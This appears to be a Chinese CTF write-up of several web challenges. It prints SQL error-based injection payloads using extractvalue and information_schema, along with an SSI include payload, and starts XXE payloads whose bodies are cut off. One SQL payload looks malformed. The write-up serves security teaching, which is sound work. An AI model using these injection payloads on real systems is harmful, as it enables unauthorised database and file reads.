Simple BBS
登录处没有过滤单引号,且没有报错信息,利用报错注入注出flag
1 |
admin'union select (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables),0x7e)))# |
尝试一下读一下flag,发现限制了长度,利用substr进行读取
1 |
admin'union select (extractvalue(1,substr((select flag from flag),20,40),0x7e)))# |
Simple Blog
题目提示了一下是二次注入和文件包含漏洞,尝试一下正常的访问,答题以后分数是会进行计算然后正常显示的
注册一个用户名为lll’的用户进行答题,发现分数会一直都是0,所以二次注入的点应该是在这里
利用exp进行报错盲注
1 |
# -*- coding:utf8 -*- |
SimpleServerInjection
提示是ssi漏洞,博客做题23333
https://www.secpulse.com/archives/66934.html
然后
1 |
<!--#include virtual="flag"--> |
就有flag了
SimpleExtensionExplorerInjection
这题给了源码的包,审计源码可以看到UserController.php里面有个UserPayload
可以看到函数里面有个@XBRead函数,可以解析XML同时回显,XXE打过去
1 |
<?xml version="1.0" encoding="UTF-8"?> |
然后就能有flag了
SimplePrintEventLogger
这题跟上一题差不多,感觉只是多了个框架,但是发送的请求还是可以进行xml解析,只不过这次不知道flag文件叫什么,继续XXE打过去
1 |
<?xml version="1.0" encoding="UTF-8"?> |
发现回显的目录里面有个flagvvvvvaaaagegsgag2333文件,继续读就有flag了
1 |
|
SimpleWasmReverse
这题逆向肉鸡真的不会,溜溜球了
FROM:Xi4or0uji
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论